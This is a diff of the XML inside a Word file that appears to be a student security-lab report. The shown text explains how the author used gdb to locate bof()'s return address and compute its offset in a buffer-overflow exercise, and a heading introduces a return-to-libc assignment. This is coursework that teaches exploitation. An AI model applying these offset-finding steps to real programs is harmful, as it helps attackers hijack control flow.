+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(way 1) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To find </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6256,6 +6272,461 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>way</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2) First I wrote “ABCD” into </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. Then use “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E9363D5" wp14:editId="355A8E46">
+            <wp:extent cx="4023442" cy="5376862"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="28" name="图片 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4029141" cy="5384478"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e can see the normal return address of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>) is 0x0804852e.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hen set a breakpoint at </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) as “b </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”. Use “x/16wx $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>” to see what’s in the stack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="599FD646" wp14:editId="7BB3A397">
+            <wp:extent cx="5274310" cy="1782445"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="29" name="图片 29"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1782445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e can now see the “ABCD” string(yellow) and the normal return address(green), and the distance between them (9 * 4 bytes). So in buffer array, the address should be located at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>36] of buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(long) * 9].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C44A0B" wp14:editId="5C38A448">
+            <wp:extent cx="5274310" cy="1782445"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="30" name="图片 30"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1782445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>O</w:t>
       </w:r>
       <w:r>
@@ -6644,7 +7115,7 @@
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="13"/>
@@ -6808,8 +7279,8 @@
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New" w:hint="eastAsia"/>
+          <w:color w:val="008000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
@@ -6825,18 +7296,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
-        <w:jc w:val="left"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
           <w:color w:val="008000"/>
@@ -6844,56 +7304,7 @@
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="13"/>
-          <w:szCs w:val="13"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
-          <w:color w:val="008000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="13"/>
-          <w:szCs w:val="13"/>
-        </w:rPr>
         <w:t>// Part 2: Filled bytes (done)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="13"/>
-          <w:szCs w:val="13"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="13"/>
-          <w:szCs w:val="13"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7572,7 +7983,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25">
+                    <a:blip r:embed="rId28">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7661,7 +8072,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7739,7 +8150,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7775,6 +8186,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491CA096" wp14:editId="0995EFB3">
             <wp:extent cx="1868285" cy="1719830"/>
@@ -7791,7 +8203,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7827,7 +8239,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>I</w:t>
       </w:r>
       <w:r>
@@ -9285,7 +9696,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9373,7 +9784,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9498,7 +9909,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31">
+                    <a:blip r:embed="rId34">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9546,6 +9957,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DAD8E18" wp14:editId="49232C86">
             <wp:extent cx="4076700" cy="1285875"/>
@@ -9564,7 +9976,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32">
+                    <a:blip r:embed="rId35">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9695,7 +10107,6 @@
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>2.</w:t>
       </w:r>
       <w:r>
@@ -9796,7 +10207,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9908,7 +10319,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10028,6 +10439,86 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10042,6 +10533,7 @@
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CS648: Write a detailed report about return-to-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -10072,40 +10564,5017 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
